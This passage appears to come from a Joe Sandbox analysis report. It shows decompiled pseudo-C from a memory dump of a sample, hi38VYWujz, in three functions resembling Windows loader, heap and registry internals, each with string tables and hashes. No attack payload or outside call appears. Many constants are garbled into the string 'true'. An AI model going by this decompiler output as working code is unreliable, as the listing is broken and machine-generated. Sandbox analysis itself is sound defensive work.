				signed int _t183;
				signed int _t184;
				signed int _t186;
				signed int _t188;
				signed int _t189;
				void* _t190;
				void* _t192;
				short _t193;
				intOrPtr _t195;
				signed int _t199;
				void* _t201;
				void* _t203;
				void* _t205;

				_push("true");
				_push(0x36bbcd18);
				E36B37BE4(__ebx, __edi, __esi);
				 *(_t201 - 0x24) = 0xc0000001;
				_t195 =  *((intOrPtr*)(_t201 + 8));
				 *((intOrPtr*)(_t195 + 0x4c)) =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_push("true");
				_pop(_t180);
				_t164 = E36B679B8(_t195, _t180);
				if(_t164 != 0) {
					 *_t164 =  *_t164 & 0x00000000;
					 *(_t195 + 0x38) = _t164;
					E36AEFED0(0x36bd4800);
					 *(_t201 - 4) =  *(_t201 - 4) & 0x00000000;
					_t199 = E36B87ABE(_t164, 0x36b67c20, _t195, _t195, __esi, __eflags, 2);
					 *(_t201 - 0x24) = _t199;
					__eflags = _t199;
					if(_t199 < 0) {
						_t82 = _t195 + 0x38;
						 *_t82 =  *(_t195 + 0x38) & 0x00000000;
						__eflags =  *_t82;
						goto L32;
					} else {
						__eflags =  *(_t195 + 0x20) & 0x00000008;
						if(( *(_t195 + 0x20) & 0x00000008) == 0) {
							L32:
							__eflags = _t199;
							if(_t199 >= 0) {
								__eflags =  *(_t195 + 0x20) & 0x00000210;
								if(( *(_t195 + 0x20) & 0x00000210) != 0) {
									 *(_t201 - 0x7c) =  *(_t201 - 0x7c) | 0xffffffff;
									 *(_t201 - 0x78) =  *(_t195 + 0x40);
									 *((intOrPtr*)(_t201 - 0x70)) = E36B68250;
									 *((intOrPtr*)(_t201 - 0x6c)) = _t201 - 0x50;
									__eflags =  *(_t195 + 0x20) & 0x00000010;
									_t124 = 0;
									 *((intOrPtr*)(_t201 - 0x74)) = 3 + (_t124 & 0xffffff00 | ( *(_t195 + 0x20) & 0x00000010) != 0x00000000) * 2;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									 *((intOrPtr*)(_t201 - 0x50)) =  *((intOrPtr*)(_t201 + 8));
									 *(_t201 - 0x4c) = _t164;
									_t106 = _t201 - 0x48;
									 *_t106 =  *(_t201 - 0x48) & 0x00000000;
									__eflags =  *_t106;
									 *(_t201 - 0x44) =  &(_t164[1]);
									_push(0);
									_push("true");
									_push(_t201 - 0x7c);
									_push(2);
									_push(0);
									_t199 = E36B86EF0(_t164, _t201 - 0x50, _t199,  *_t106);
									goto L35;
								}
							}
						} else {
							_t132 =  *0x36bd6d3c; // 0x0
							 *(_t201 - 0x2c) = _t132;
							__eflags = _t132;
							if(_t132 == 0) {
								L9:
								_t133 = 0;
								__eflags = 0;
								while(1) {
									 *(_t201 - 0x30) = _t133;
									__eflags = _t133 -  *_t164;
									if(_t133 >=  *_t164) {
										goto L32;
									}
									_t171 = _t133 << 6;
									 *(_t201 - 0x3c) = _t171;
									_t182 =  *(_t195 + 0x40);
									__eflags = _t182;
									if(_t182 == 0) {
										L13:
										_t134 =  *( &(_t164[1]) + _t171);
										 *(_t201 - 0x2c) = _t134;
										_t183 =  *(_t134 + 0x84) & 0x0000ffff;
										 *(_t201 - 0x34) = _t183;
										 *( &(_t164[6]) + _t171) = _t183;
										_t184 = _t183 << 6;
										 *(_t201 - 0x1c) = _t184;
										 *(_t201 - 0x38) = _t184;
										__eflags =  *(_t134 + 0xbc);
										if( *(_t134 + 0xbc) != 0) {
											 *( &(_t164[6]) + _t171) =  *(_t201 - 0x34) + 0x81;
											_t184 = _t184 + 0x2040;
											__eflags = _t184;
											 *(_t201 - 0x1c) = _t184;
											 *(_t201 - 0x38) = _t184;
										}
										_t173 = E36B679B8(_t195, _t184);
										 *(_t201 - 0x20) = _t173;
										__eflags = _t173;
										if(_t173 == 0) {
											goto L7;
										} else {
											E36B28F40(_t173, 0,  *(_t201 - 0x1c));
											_t205 = _t203 + 0xc;
											_t174 =  *(_t201 - 0x20);
											_t137 =  *(_t201 - 0x3c);
											 *( &(_t164[0xf]) + _t137) = _t174;
											_t186 =  *( *(_t201 - 0x2c) + 0xbc);
											 *(_t201 - 0x1c) = _t186;
											 *(_t201 - 0x40) = _t186;
											__eflags = _t186;
											if(_t186 != 0) {
												 *((intOrPtr*)( &(_t164[8]) + _t137)) = 0x81;
												 *((intOrPtr*)( &(_t164[9]) + _t137)) = 8;
												_t189 = 0;
												__eflags = 0;
												 *(_t201 - 0x28) = 0;
												_t143 =  *(_t201 - 0x1c);
												while(1) {
													__eflags = _t189 - 0x80;
													if(_t189 > 0x80) {
														goto L26;
													}
													 *_t174 =  *_t143;
													 *((intOrPtr*)(_t174 + 4)) =  *((intOrPtr*)( *(_t201 - 0x1c) + 4));
													 *(_t174 + 8) =  *( *(_t201 - 0x1c) + 8) << 3;
													 *((short*)(_t174 + 0xc)) = _t189 | 0x00008000;
													_t176 = _t174 + 0x10;
													__eflags = _t189;
													if(_t189 != 0) {
														__eflags = _t189 - 0x80;
														if(_t189 >= 0x80) {
															_push(L"VirtualAlloc");
															_push("true");
															_pop(_t190);
															E36B05C3F(_t176, _t190);
														} else {
															_t155 = _t189 << 3;
															__eflags = _t155;
															_push(_t155);
															_push(L"Objects=%4u");
															goto L23;
														}
													} else {
														_push(0x400);
														_push(L"Objects>%4u");
														L23:
														_push("true");
														_push(_t176);
														E36B6776B();
														_t205 = _t205 + 0x10;
													}
													_t174 =  *(_t201 - 0x20) + 0x40;
													 *(_t201 - 0x20) = _t174;
													_t143 =  *(_t201 - 0x1c) + 0xc;
													 *(_t201 - 0x1c) = _t143;
													 *(_t201 - 0x40) = _t143;
													_t189 =  *(_t201 - 0x28) + 1;
													 *(_t201 - 0x28) = _t189;
												}
											}
											L26:
											E36B28C00(_t174,  *((intOrPtr*)( *(_t201 - 0x2c) + 0x88)), ( *( *(_t201 - 0x2c) + 0x84) & 0x0000ffff) << 6);
											_t203 = _t205 + 0xc;
											_t188 = 0;
											__eflags = 0;
											 *(_t201 - 0x28) = 0;
											_t175 =  *(_t201 - 0x20);
											while(1) {
												_t141 =  *(_t201 - 0x2c);
												__eflags = _t188 - ( *(_t141 + 0x84) & 0x0000ffff);
												if(_t188 >= ( *(_t141 + 0x84) & 0x0000ffff)) {
													break;
												}
												 *(_t175 + 8) =  *(_t175 + 8) << 3;
												_t175 = _t175 + 0x40;
												 *(_t201 - 0x20) = _t175;
												_t188 = _t188 + 1;
												 *(_t201 - 0x28) = _t188;
											}
											_t133 =  *(_t201 - 0x30);
											goto L30;
										}
									} else {
										__eflags = _t182 -  *( &(_t164[1]) + _t171);
										if(_t182 !=  *( &(_t164[1]) + _t171)) {
											L30:
											_t133 = _t133 + 1;
											continue;
										} else {
											goto L13;
										}
									}
									goto L36;
								}
								goto L32;
							} else {
								__eflags =  *(_t132 + 0x88);
								if( *(_t132 + 0x88) == 0) {
									goto L9;
								} else {
									_push("true");
									_pop(_t192);
									_t159 = E36B679B8(_t195, _t192);
									 *(_t201 - 0x1c) = _t159;
									__eflags = _t159;
									if(_t159 != 0) {
										E36B28F40(_t159, 0, "true");
										_t203 = _t203 + 0xc;
										_t161 =  *(_t201 - 0x2c);
										_t179 =  *(_t201 - 0x1c);
										 *_t179 = _t161;
										 *((intOrPtr*)(_t179 + 4)) =  *((intOrPtr*)(_t161 + 0x40));
										_push("true");
										_pop(_t193);
										 *((short*)(_t179 + 8)) = _t193;
										 *_t164 =  *_t164 + 1;
										__eflags =  *_t164;
										goto L9;
									} else {
										L7:
										_t199 = 0xc0000017;
										L35:
										 *(_t201 - 0x24) = _t199;
									}
								}
							}
						}
					}
					L36:
					 *(_t201 - 4) = 0xfffffffe;
					E36B67387();
					_t121 = _t199;
				} else {
					_t121 = 0xc0000017;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t201 - 0x10));
				return _t121;
			}

0x36b67090
0x36b67092
0x36b67097
0x36b6709c
0x36b670ac
0x36b670af
0x36b670b2
0x36b670b4
0x36b670bc
0x36b670c0
0x36b670cc
0x36b670cf
0x36b670d7
0x36b670dc
0x36b670ee
0x36b670f0
0x36b670f3
0x36b670f5
0x36b672f6
0x36b672f6
0x36b672f6
0x00000000
0x36b670fb
0x36b670fb
0x36b670ff
0x36b672fa
0x36b672fa
0x36b672fc
0x36b672fe
0x36b67305
0x36b67307
0x36b6730e
0x36b67311
0x36b6731b
0x36b6731e
0x36b67324
0x36b6732f
0x36b67337
0x36b67338
0x36b67339
0x36b6733a
0x36b6733e
0x36b67341
0x36b67344
0x36b67344
0x36b67344
0x36b6734b
0x36b6734e
0x36b67350
0x36b67355
0x36b67356
0x36b67358
0x36b6735f
0x00000000
0x36b6735f
0x36b67305
0x36b67105
0x36b67105
0x36b6710a
0x36b6710d
0x36b6710f
0x36b67159
0x36b67159
0x36b67159
0x36b6715b
0x36b6715b
0x36b6715e
0x36b67160
0x00000000
0x00000000
0x36b67168
0x36b6716b
0x36b6716e
0x36b67171
0x36b67173
0x36b6717f
0x36b6717f
0x36b67183
0x36b67186
0x36b6718d
0x36b67190
0x36b67194
0x36b67197
0x36b6719a
0x36b6719d
0x36b671a4
0x36b671ae
0x36b671b2
0x36b671b2
0x36b671b8
0x36b671bb
0x36b671bb
0x36b671c5
0x36b671c7
0x36b671ca
0x36b671cc
0x00000000
0x36b671d2
0x36b671d8
0x36b671dd
0x36b671e0
0x36b671e3
0x36b671e6
0x36b671ed
0x36b671f3
0x36b671f6
0x36b671f9
0x36b671fb
0x36b67201
0x36b67209
0x36b67211
0x36b67211
0x36b67213
0x36b67216
0x36b67219
0x36b67219
0x36b6721f
0x00000000
0x00000000
0x36b67227
0x36b6722f
0x36b6723b
0x36b67245
0x36b67249
0x36b6724c
0x36b6724e
0x36b6725c
0x36b67262
0x36b6727c
0x36b67281
0x36b67283
0x36b67284
0x36b67264
0x36b67266
0x36b67266
0x36b67269
0x36b6726a
0x00000000
0x36b6726a
0x36b67250
0x36b67250
0x36b67255
0x36b6726f
0x36b6726f
0x36b67271
0x36b67272
0x36b67277
0x36b67277
0x36b6728c
0x36b6728f
0x36b67295
0x36b67298
0x36b6729b
0x36b672a1
0x36b672a2
0x36b672a2
0x36b67219
0x36b672aa
0x36b672bf
0x36b672c4
0x36b672c7
0x36b672c7
0x36b672c9
0x36b672cc
0x36b672cf
0x36b672cf
0x36b672d9
0x36b672db
0x00000000
0x00000000
0x36b672dd
0x36b672e1
0x36b672e4
0x36b672e7
0x36b672e8
0x36b672e8
0x36b672ed
0x00000000
0x36b672ed
0x36b67175
0x36b67175
0x36b67179
0x36b672f0
0x36b672f0
0x00000000
0x00000000
0x00000000
0x00000000
0x36b67179
0x00000000
0x36b67173
0x00000000
0x36b67111
0x36b67111
0x36b67118
0x00000000
0x36b6711a
0x36b6711a
0x36b6711c
0x36b6711f
0x36b67124
0x36b67127
0x36b67129
0x36b6713a
0x36b6713f
0x36b67142
0x36b67145
0x36b67148
0x36b6714d
0x36b67150
0x36b67152
0x36b67153
0x36b67157
0x36b67157
0x00000000
0x36b6712b
0x36b6712b
0x36b6712b
0x36b67361
0x36b67361
0x36b67361
0x36b67129
0x36b67118
0x36b6710f
0x36b670ff
0x36b67364
0x36b67364
0x36b6736b
0x36b67370
0x36b670c2
0x36b670c2
0x36b670c2
0x36b67375
0x36b67381

Strings

VirtualAlloc, xrefs: 36B6727C
Objects=%4u, xrefs: 36B6726A
Objects>%4u, xrefs: 36B67255

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: Objects=%4u$Objects>%4u$VirtualAlloc
API String ID: 0-3870751728
Opcode ID: 4591cf32d777c6c6cc7de7351335f4043756df1acb46a8725bde06730180025e
Instruction ID: 756e12a485bfd505224669a58bb20676c6a72c4f8986460297c25c2b848c21de
Opcode Fuzzy Hash: 4591cf32d777c6c6cc7de7351335f4043756df1acb46a8725bde06730180025e
Instruction Fuzzy Hash: 0D913CB4E006159FEB14CF6AC894B9DBBB1FF48318F24817AE904AB391E7359841CF94

Uniqueness

Uniqueness Score: -1.00%

Function 36AEB360 Relevance: 4.0, Strings: 3, Instructions: 221
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E36AEB360(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				short _t85;
				short _t86;
				intOrPtr* _t88;
				signed char* _t89;
				void* _t90;
				signed char* _t91;
				signed int _t93;
				signed int _t95;
				void* _t97;
				intOrPtr* _t99;
				signed int _t105;
				signed short _t109;
				void* _t114;
				signed char _t117;
				signed char _t118;
				signed int _t124;
				short _t127;
				signed int _t131;
				signed char* _t132;
				signed int _t135;
				intOrPtr _t137;
				signed short _t139;
				signed int _t143;
				intOrPtr _t148;
				signed int _t160;
				intOrPtr _t169;
				void* _t171;
				void* _t173;
				signed char _t186;

				_push("true");
				_push(0x36bbbf88);
				E36B37BE4(__ebx, __edi, __esi);
				 *((char*)(_t173 - 0x1d)) = 1;
				 *(_t173 - 0x24) = 1;
				_t127 = 0x42;
				 *((short*)(_t173 - 0x44)) = _t127;
				_push("true");
				_pop(_t85);
				 *((short*)(_t173 - 0x42)) = _t85;
				 *(_t173 - 0x40) = L"LdrpResGetResourceDirectory Enter";
				_push("true");
				_pop(_t86);
				 *((short*)(_t173 - 0x4c)) = _t86;
				 *((short*)(_t173 - 0x4a)) = _t127;
				 *(_t173 - 0x48) = L"LdrpResGetResourceDirectory Exit";
				_t88 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t88 != 0) {
					if( *_t88 == 0) {
						goto L1;
					}
					_t89 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					L2:
					if(( *_t89 & 0x00000001) != 0) {
						_t90 = E36AF3C40();
						_t165 = 0x7ffe0384;
						if(_t90 == 0) {
							_t91 = 0x7ffe0384;
						} else {
							_t91 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						E36B6FC01(_t173 - 0x44,  *_t91 & 0x000000ff);
					} else {
						_t165 = 0x7ffe0384;
					}
					_t124 =  *(_t173 + 8);
					if(_t124 == 0 ||  *((intOrPtr*)(_t173 + 0x14)) == 0 ||  *((intOrPtr*)(_t173 + 0x18)) == 0) {
						_t93 = 0xc000000d;
						goto L31;
					} else {
						if((_t124 & 0x00000003) != 0) {
							_t117 = _t124 & 0x00000001;
							_t124 = _t124 & 0xfffffffc;
							_t118 = _t117 ^ 0x00000001;
							_t186 = _t118;
							 *(_t173 - 0x24) = _t118;
						}
						 *(_t173 + 0x10) =  *(_t173 + 0x10) & 0x00001000;
						_push(_t173 - 0x28);
						_push(0);
						_push( *((intOrPtr*)(_t173 + 0xc)));
						_push(_t124);
						_t95 = 0;
						_push(_t95 & 0xffffff00 | _t186 == 0x00000000);
						_t93 = E36AEE580();
						if(_t93 < 0) {
							L31:
							 *[fs:0x0] =  *((intOrPtr*)(_t173 - 0x10));
							return _t93;
						} else {
							 *(_t173 - 4) =  *(_t173 - 4) & 0x00000000;
							_t146 =  *((intOrPtr*)(_t173 - 0x28));
							_t97 =  *((intOrPtr*)(_t173 - 0x28)) + 0x18;
							_t131 =  *_t97 & 0x0000ffff;
							if(_t131 != 0x10b) {
								if(_t131 != 0x20b) {
									 *(_t173 - 0x1c) = 0xc000007b;
									 *(_t173 - 4) = 0xfffffffe;
									L28:
									_t132 = 0x7ffe0385;
									_t99 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
									if(_t99 != 0) {
										if( *_t99 != 0) {
											_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
										}
									}
									if(( *_t132 & 0x00000001) != 0) {
										if(E36AF3C40() != 0) {
											_t165 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
										}
										E36B6FC01(_t173 - 0x4c,  *_t165 & 0x000000ff);
									}
									_t93 =  *(_t173 - 0x1c);
									goto L31;
								}
								_push("true");
								_pop(_t135);
								memcpy(_t173 - 0x13c, _t97, _t135 << 2);
								_t137 = 0;
								L12:
								_t105 =  *(_t173 - 0xe0);
								if(_t137 == 0) {
									_t105 =  *(_t173 - 0xd0);
								}
								if(_t105 <= 2) {
									L36:
									 *(_t173 - 0x1c) = 0xc0000089;
									goto L37;
								} else {
									_t169 =  *((intOrPtr*)(_t173 - 0xcc));
									if(_t137 == 0) {
										_t169 =  *((intOrPtr*)(_t173 - 0xbc));
									}
									if(_t169 == 0) {
										goto L36;
									} else {
										if( *(_t173 - 0x24) == 0) {
											if(_t169 <  *((intOrPtr*)(_t173 - 0x100))) {
												goto L17;
											}
											_t160 =  *(_t173 + 0x10);
											_t114 = E36AE81C2(_t124,  *((intOrPtr*)(_t173 + 0xc)), _t146, 0, _t169, (_t105 & 0xffffff00 | _t160 != 0x00000000) & 0x000000ff);
											if(_t114 == 0) {
												L42:
												 *(_t173 - 0x1c) = 0xc000007b;
												L37:
												 *(_t173 - 4) = 0xfffffffe;
												L27:
												_t165 = 0x7ffe0384;
												goto L28;
											}
											if( *((intOrPtr*)(_t114 + 0x10)) == 0) {
												goto L36;
											}
											_t148 =  *((intOrPtr*)(_t114 + 0x14)) -  *((intOrPtr*)(_t114 + 0xc)) + _t169 + _t124;
											L19:
											 *((intOrPtr*)(_t173 - 0x34)) = _t148;
											 *(_t173 - 4) = 0xfffffffe;
											if(_t148 == 0) {
												 *(_t173 - 0x1c) = 0xc0000089;
												goto L27;
											}
											if(_t160 == 0) {
												L26:
												 *((intOrPtr*)( *((intOrPtr*)(_t173 + 0x14)))) = _t148;
												 *((intOrPtr*)( *((intOrPtr*)(_t173 + 0x18)))) =  *((intOrPtr*)(_t173 - 0x28));
												 *(_t173 - 0x1c) =  *(_t173 - 0x1c) & 0x00000000;
												goto L27;
											}
											if(_t148 <= _t124) {
												L49:
												 *(_t173 - 0x1c) = 0xc000007b;
												goto L27;
											}
											_t171 =  *((intOrPtr*)(_t173 + 0xc)) + (_t124 & 0xfffffffc);
											if(_t148 + 0x10 > _t171) {
												goto L49;
											}
											 *(_t173 - 4) = 1;
											_t109 =  *((intOrPtr*)(_t148 + 0xc));
											 *(_t173 - 0x2c) = _t109;
											_t139 =  *((intOrPtr*)(_t148 + 0xe));
											 *(_t173 - 0x30) = _t139;
											 *(_t173 - 4) = 0xfffffffe;
											if(_t109 != 0 || _t139 != 0) {
												if(_t148 + ((_t139 & 0x0000ffff) + (_t109 & 0x0000ffff)) * 8 > _t171) {
													goto L49;
												}
												goto L26;
											} else {
												 *(_t173 - 0x1c) = 0xc000008a;
												goto L27;
											}
										}
										L17:
										_t148 = _t169 + _t124;
										if(_t148 < _t124) {
											goto L42;
										}
										_t160 =  *(_t173 + 0x10);
										goto L19;
									}
								}
							}
							_push("true");
							_pop(_t143);
							memcpy(_t173 - 0x13c, _t97, _t143 << 2);
							_t137 =  *((intOrPtr*)(_t173 - 0x1d));
							goto L12;
						}
					}
				}
				L1:
				_t89 = 0x7ffe0385;
				goto L2;
			}

0x36aeb360
0x36aeb365
0x36aeb36a
0x36aeb36f
0x36aeb373
0x36aeb379
0x36aeb37a
0x36aeb37e
0x36aeb380
0x36aeb381
0x36aeb385
0x36aeb38c
0x36aeb38e
0x36aeb38f
0x36aeb393
0x36aeb397
0x36aeb3a4
0x36aeb3a9
0x36b4353d
0x00000000
0x00000000
0x36b4354c
0x36aeb3b4
0x36aeb3b7
0x36b43556
0x36b4355b
0x36b43562
0x36b43574
0x36b43564
0x36b4356d
0x36b4356d
0x36b4357c
0x36aeb3bd
0x36aeb3bd
0x36aeb3bd
0x36aeb3c2
0x36aeb3c7
0x36b43631
0x00000000
0x36aeb3e1
0x36aeb3e4
0x36aeb3e8
0x36aeb3eb
0x36aeb3ee
0x36aeb3ee
0x36aeb3f0
0x36aeb3f0
0x36aeb3f3
0x36aeb3fd
0x36aeb3fe
0x36aeb400
0x36aeb403
0x36aeb406
0x36aeb40a
0x36aeb40b
0x36aeb412
0x36aeb530
0x36aeb533
0x36aeb53f
0x36aeb418
0x36aeb418
0x36aeb41c
0x36aeb41f
0x36aeb422
0x36aeb42d
0x36aeb59c
0x36b435bd
0x36b435c4
0x36aeb50e
0x36aeb50e
0x36aeb519
0x36aeb51e
0x36b435ef
0x36b435fe
0x36b435fe
0x36b435ef
0x36aeb527
0x36b43610
0x36b4361b
0x36b4361b
0x36b43627
0x36b43627
0x36aeb52d
0x00000000
0x36aeb52d
0x36aeb5a2
0x36aeb5a4
0x36aeb5ad
0x36aeb5af
0x36aeb443
0x36aeb445
0x36aeb44b
0x36aeb5b6
0x36aeb5b6
0x36aeb454
0x36aeb581
0x36aeb581
0x00000000
0x36aeb45a
0x36aeb45c
0x36aeb462
0x36aeb5c1
0x36aeb5c1
0x36aeb46a
0x00000000
0x36aeb470
0x36aeb474
0x36aeb548
0x00000000
0x00000000
0x36aeb54e
0x36aeb563
0x36aeb56a
0x36aeb5cc
0x36aeb5cc
0x36aeb588
0x36aeb588
0x36aeb509
0x36aeb509
0x00000000
0x36aeb509
0x36aeb570
0x00000000
0x00000000
0x36aeb57a
0x36aeb488
0x36aeb488
0x36aeb48b
0x36aeb494
0x36b435b1
0x00000000
0x36b435b1
0x36aeb49c
0x36aeb4f8
0x36aeb4fb
0x36aeb503
0x36aeb505
0x00000000
0x36aeb505
0x36aeb4a0
0x36b43586
0x36b43586
0x00000000
0x36b43586
0x36aeb4ac
0x36aeb4b3
0x00000000
0x00000000
0x36aeb4b9
0x36aeb4c0
0x36aeb4c4
0x36aeb4c8
0x36aeb4cc
0x36aeb4d0
0x36aeb4da
0x36aeb4f2
0x00000000
0x00000000
0x00000000
0x36b43592
0x36b43592
0x00000000
0x36b43592
0x36aeb4da
0x36aeb47a
0x36aeb47a
0x36aeb47f
0x00000000
0x00000000
0x36aeb485
0x00000000
0x36aeb485
0x36aeb46a
0x36aeb454
0x36aeb433
0x36aeb435
0x36aeb43e
0x36aeb440
0x00000000
0x36aeb440
0x36aeb412
0x36aeb3c7
0x36aeb3af
0x36aeb3af
0x00000000

Strings

LdrpResGetResourceDirectory Enter, xrefs: 36AEB385
LdrpResGetResourceDirectory Exit, xrefs: 36AEB397
{, xrefs: 36B435BD

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-373624363
Opcode ID: ecce0a8fc97a8e010e895cb928647d1af432f89131da7bde790ace74b5293713
Instruction ID: 58c80f7139674bc309b0c33ba9d163050b6a2fa6c188b7ea1ae5e8d9ad7d9e34
Opcode Fuzzy Hash: ecce0a8fc97a8e010e895cb928647d1af432f89131da7bde790ace74b5293713
Instruction Fuzzy Hash: EC91CE75E06365CBEB12CF56CA547ADB7F0EF00368F644196EC11AB290D7789A80CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 36BBB2BC Relevance: 3.9, Strings: 3, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E36BBB2BC(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				char _v532;
				signed int* _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v546;
				signed int _v548;
				signed int _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				char _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				signed int* _v588;
				intOrPtr _v592;
				char _v596;
				char _v600;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t66;
				void* _t70;
				void* _t73;
				void* _t82;
				void* _t86;
				void* _t89;
				intOrPtr* _t101;
				intOrPtr _t112;
				signed int _t114;
				signed int _t115;

				_t111 = __edx;
				_v8 =  *0x36bdb370 ^ _t115;
				_v556 = _a4;
				_t112 = 0;
				_v540 = _v540 & 0;
				_v536 = _a8;
				_v560 = __ecx;
				_t101 = E36AF5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", "true");
				if(_t101 == 0) {
					_t113 = 0xc0000017;
					L4:
					if(_t113 < 0) {
						L25:
						if(_t101 != 0) {
							E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t101);
						}
						return E36B24B50(_t113, _t101, _v8 ^ _t115, _t111, _t112, _t113);
					} else {
						_t66 =  *((intOrPtr*)(_t112 + 1));
						if(_t66 < 2 || _t66 == 5 &&  *((intOrPtr*)(_t112 + 8)) == 0x15 &&  *((intOrPtr*)(_t112 + 0x18)) == 0x1f7) {
							_t113 = 0xc0000136;
							_v540 = 1;
							 *_v536 =  *_v536 & 0x00000000;
						}
						_t124 = _t113;
						if(_t113 >= 0) {
							_t70 = E36B039C0(_t101, _t113, _t124,  &_v572, _t112, "true");
							_t113 = _t70;
							if(_t70 >= 0) {
								_v552 = _v552 & 0x00000000;
								_t73 = E36B15BE0(L"GlobalizationUserSettings", L"TargetNtPath", L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\International", 0,  &_v532, 0x208,  &_v552);
								_t113 = _t73;
								if(_t73 >= 0) {
									_t107 = _v552 + 4;
									_t114 = _v572 + _v552 + 0x00000004 & 0x0000ffff;
									_t112 = E36AF5D90(_v552 + 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", _t114);
									if(_t112 == 0) {
										_t113 = 0xc0000017;
									} else {
										_v548 = _v548 & 0x00000000;
										_v546 = _t114;
										_v544 = _t112;
										_t82 = E36AEFE40(_t107,  &_v548,  &_v532);
										_t113 = _t82;
										if(_t82 >= 0) {
											_t86 = E36AEFE40(_t107,  &_v548, "\\");
											_t113 = _t86;
											if(_t86 >= 0) {
												_t89 = E36B010D0(_t107,  &_v548,  &_v572);
												_t113 = _t89;
												if(_t89 >= 0) {
													_v596 = 0x18;
													_v588 =  &_v548;
													_v592 = 0;
													_push( &_v596);
													_push(0x20019);
													_v584 = 0x240;
													_push( &_v564);
													_v580 = 0;
													_v576 = 0;
													if( *0x36ab733c() < 0) {
														__eflags = 1;
														_v540 = 1;
														 *_v536 = 1;
													} else {
														 *0x36ab7340(_v564);
														 *_v536 = 2;
														_t113 =  *0x36ab733c(_v556, _v560,  &_v596);
													}
												}
											}
										}
										E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t112);
									}
								}
								E36AF3B90( &_v572);
							}
						}
						if(_v540 != 0) {
							_t111 = _v556;
							_t113 = E36BBB55F(_v560, _v556);
						}
						goto L25;
					}
				}
				_t113 =  *0x36ab7348(0xfffffffa, "true", _t101, "true",  &_v600);
				if(_t113 < 0) {
					goto L25;
				} else {
					_t112 =  *_t101;
					goto L4;
				}
			}

0x36bbb2bc
0x36bbb2ce
0x36bbb2d7
0x36bbb2dd
0x36bbb2e2
0x36bbb2e8
0x36bbb2f8
0x36bbb306
0x36bbb30a
0x36bbb32e
0x36bbb333
0x36bbb335
0x36bbb537
0x36bbb539
0x36bbb547
0x36bbb547
0x36bbb55c
0x36bbb33b
0x36bbb33b
0x36bbb340
0x36bbb35b
0x36bbb360
0x36bbb36a
0x36bbb36a
0x36bbb36d
0x36bbb36f
0x36bbb37f
0x36bbb384
0x36bbb388
0x36bbb38e
0x36bbb3b9
0x36bbb3be
0x36bbb3c2
0x36bbb3d4
0x36bbb3d9
0x36bbb3ed
0x36bbb3f1
0x36bbb50a
0x36bbb3f7
0x36bbb3f7
0x36bbb40b
0x36bbb413
0x36bbb419
0x36bbb41e
0x36bbb422
0x36bbb434
0x36bbb439
0x36bbb43d
0x36bbb451
0x36bbb456
0x36bbb45a
0x36bbb466
0x36bbb470
0x36bbb47e
0x36bbb484
0x36bbb485
0x36bbb490
0x36bbb49a
0x36bbb49b
0x36bbb4a1
0x36bbb4af
0x36bbb4ee
0x36bbb4ef
0x36bbb4f5
0x36bbb4b1
0x36bbb4b7
0x36bbb4c3
0x36bbb4e2
0x36bbb4e2
0x36bbb4af
0x36bbb45a
0x36bbb43d
0x36bbb503
0x36bbb503
0x36bbb3f1
0x36bbb516
0x36bbb516
0x36bbb388
0x36bbb522
0x36bbb524
0x36bbb535
0x36bbb535
0x00000000
0x36bbb522
0x36bbb335
0x36bbb320
0x36bbb324
0x00000000
0x36bbb32a
0x36bbb32a
0x00000000
0x36bbb32a

Strings

TargetNtPath, xrefs: 36BBB3AF
GlobalizationUserSettings, xrefs: 36BBB3B4
\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 36BBB3AA

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
